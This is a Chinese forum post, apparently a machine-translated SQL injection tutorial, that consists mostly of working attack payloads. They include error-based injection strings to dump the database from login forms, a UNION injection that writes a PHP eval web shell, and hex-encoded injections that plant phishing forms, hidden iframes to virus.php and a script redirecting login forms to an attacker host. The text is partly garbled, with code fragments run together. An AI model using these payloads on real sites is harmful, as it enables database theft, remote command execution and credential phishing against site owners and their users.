51Testing软件测试论坛

标题: mysql注入7 [打印本页]

作者: 悠悠小仙仙    时间: 2019-2-1 16:03
标题: mysql注入7
#0x10~更新
我借此机会更新此complet文件undefined
#0x10.a~绕过登录高级
我希望你喜欢阅读“Bypassing Logins”一章。 因此,现在是时候了解如何将某个易受攻击的登录表单的数据库转出。
<?phpselect username,pass from users where username="$uname" and password="$passwrd" limit 0,1select username,pass from users where username='$uname' and password='$passwrd' limit 0,1  
代码:
username : ' or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) and ''='username : " or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) and ""="username : ' or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) --+username : " or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) --+username : ' or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) #username : " or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) #username : ' or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) --username : " (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) --
您可以再次将密码字段留空。 现在让我们看看查询将传递什么。
<?phpselect username,pass from users where username='' or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) and ''='' and password='' limit 0,1  #0x10.b~SQL注入的RFI
如果您已阅读本文并了解RFI漏洞,则无需解释。 这很容易!
<?phpsite.com/?param=1+union+select+'<?eval($_request[cmd]);?>'&cmd=passthru('ls');  #0x10.c~URLS欺骗性网络钓鱼
这次标题说明了我们将使用SQL注入漏洞利用URL欺骗进行网络钓鱼。 有三种方法
我们将把有效负载注入SQL注入,并像在XSS中一样在网页上添加一些额外的代码。
首先,注入HTML。 为简单起见,我们将有效负载编码为十六进制。 对于有效载荷:
<?php<form action=http://site.com/w0rm.php method="POST">Username : <input type="text" name="username"><br>Password :<input type="text" name="password"><input type="submit"></form><iframe height=0 width=0>  
编码为十六进制:
3c666f726d20616374696f6e3d687474703a2f2f736974652e636f6d2f7730726d2e706870206d65 74686f643d22504f5354223e0d0a557365726e616d65203a203c696e70757420747970653d227465 787422206e616d653d22757365726e616d65223e3c62723e0d0a50617373776f7264203a3c696e70 757420747970653d227465787422206e616d653d2270617373776f7264223e0d0a3c696e70757420 747970653d227375626d6974223e0d0a3c2f666f726d3e0d0a3c696672616d65206865696768743d 302077696474683d303e
在注入的SQL中注入Hex(有效载荷)。
注射iframe
例如:
<?php<br><iframe src="http://site.com/virus.php" height=300 width=300 frameBorder="0" scrolling="no"></iframe>  
代码:
3c62723e3c696672616d65207372633d22687474703a2f2f736974652e636f6d2f76697275732e70 687022206865696768743d3330302077696474683d333030206672616d65426f726465723d223022 207363726f6c6c696e673d226e6f223e3c2f696672616d653e,4,5--
PHP代码:
<?phpsite.com/link.php?id=-1'+union+select+1,2,0x3c62723e3c696672616d65207372633d22687474703a2f2f736974652e6 36f6d2f76697275732e70687022206865696768743d3330302077696474683d333030206672616d6 5426f726465723d223022207363726f6c6c696e673d226e6f223e3c2f696672616d653e,4,5--  
更改当前表格
在这次攻击中,我们将在网站中注入javascript,将网站中当前登录页面的操作更改为我们的虚假登录页面链接。
<?php<script>document.getElementsByTagName("form")[0].action="http://www.site.com/virus.php"</script>  
代码:
3c7363726970743e646f63756d656e742e676574456c656d656e747342795461674e616d65282266 6f726d22295b305d2e616374696f6e3d22687474703a2f2f7777772e736974652e636f6d2f766972 75732e706870223c2f7363726970743e
PHP代码:
<?phpsite.com/link.php?id=-1' union select 1,2,0x3c7363726970743e646f63756d656e742e676574456c656d656e747342795461674e6 16d652822666f726d22295b305d2e616374696f6e3d22687474703a2f2f7777772e736974652e636 f6d2f76697275732e706870223c2f7363726970743e,4,5--  





欢迎光临 51Testing软件测试论坛 (http://bbs.51testing.com/) Powered by Discuz! X3.2